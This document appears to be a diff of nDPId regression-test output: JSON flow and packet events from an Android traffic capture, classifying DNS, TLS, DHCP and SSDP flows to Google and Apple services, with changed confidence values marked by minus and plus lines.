+00958{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871814,"flow_last_seen":1582454871913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":806,"flow_avg_l4_payload_len":134,"midstream":0,"thread_ts_msec":1582454871913,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"datasaver.googleapis.com","ja3":"554719594ba90b02ae410c297c6e50ad","ja3s":"2b0648ab686ee45e0e7c35fcfb0eea7e","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1582454871920,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1582454871920,"pkt":"TGr2n\/YnxiwDYGpkCABFAABUFXQAAEAR38PAqAIBwKgCEAA1m1AAQNQ0uKWBgAABAAEAAAAAB2FuZHJvaWQKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAARcABKzZFgo="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454871920,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.10"}} -00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":447,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871829,"flow_last_seen":1582454871933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871933,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454871920,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"android.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.10"}} +00954{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":447,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871829,"flow_last_seen":1582454871933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454871933,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"proxy.googlezip.net","ja3":"66918128f1b9b03303d77c6f2eefd128","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454871947,"flow_last_seen":1582454871947,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454871947,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1582454871947,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871947,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8i1NAAEAGKc3AqAIQrNkWCq1WAbtFj7zOAAAAAKAC\/\/\/ZVgAAAgQFtAQCCAr\/\/zedAAAAAAEDAwg="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":467,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1582454871972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454871972,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8OOwAAHYGhjSs2RYKwKgCEAG7rVbtvX7+RY+8z6AS6yDuawAAAgQFZAQCCAq7R9gE\/\/83nQEDAwg="} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1582454871974,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454871974,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0i1RAAEAGKdTAqAIQrNkWCq1WAbtFj7zP7b1+\/4AQAVcGrAAAAQEICv\/\/N6S7R9gE"} -01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871947,"flow_last_seen":1582454872014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872014,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872015,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"semanticlocation-pa.googleapis.com","ja3":"33490b1d5377580b19f7f9b5849d7991","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01035{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871947,"flow_last_seen":1582454872014,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872014,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"android.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454871741,"flow_last_seen":1582454872015,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454872015,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52514,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"semanticlocation-pa.googleapis.com","ja3":"33490b1d5377580b19f7f9b5849d7991","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872021,"flow_last_seen":1582454872021,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454872021,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1582454872021,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1582454872021,"pkt":"xiwDYGpkTGr2n\/YnCABFAABBrFBAAEARCPrAqAIQwKgCAdv4ADUALYKcD\/4BAAABAAAAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAQ=="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872021,"flow_last_seen":1582454872021,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454872021,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":485,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872021,"flow_last_seen":1582454872021,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1582454872021,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1582454872022,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1582454872022,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRBMwAAEAR8G7AqAIBwKgCEAA12\/gAPTZ5D\/6BgAABAAEAAAAABXByb3h5CWdvb2dsZXppcANuZXQAAAEAAcAMAAEAAQAAAJMABKzZFEw="} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872022,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872022,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"},"dns": {"query":"proxy.googlezip.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.76"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872031,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1582454872031,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454872031,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8+JhAAEAGvkXAqAIQrNkUTKqEAbsc\/M8rAAAAAKAC\/\/\/0BgAAAgQFtAQCCAr\/\/zezAAAAAAEDAwg="} -01076{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454780612,"flow_last_seen":1582454799515,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454779631,"flow_last_seen":1582454799004,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":77,"flow_tot_l4_payload_len":539,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871115,"flow_last_seen":1582454871117,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":40580,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871051,"flow_last_seen":1582454871090,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":32412,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454784313,"flow_last_seen":1582454866536,"flow_idle_time":200000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":3584,"flow_avg_l4_payload_len":298,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867034,"flow_last_seen":1582454867075,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1582454787658,"flow_last_seen":1582454801077,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":186,"flow_avg_l4_payload_len":26,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867637,"flow_last_seen":1582454867639,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":34540,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454870996,"flow_last_seen":1582454870998,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":36613,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454869517,"flow_last_seen":1582454872012,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5382,"flow_avg_l4_payload_len":269,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.168.206","src_port":50384,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1582454868348,"flow_last_seen":1582454870097,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5016,"flow_avg_l4_payload_len":228,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +01076{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454871947,"flow_last_seen":1582454872047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.22.10","src_port":44374,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"android.googleapis.com","ja3":"629b587f706aee60430ec3879c6edb66","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 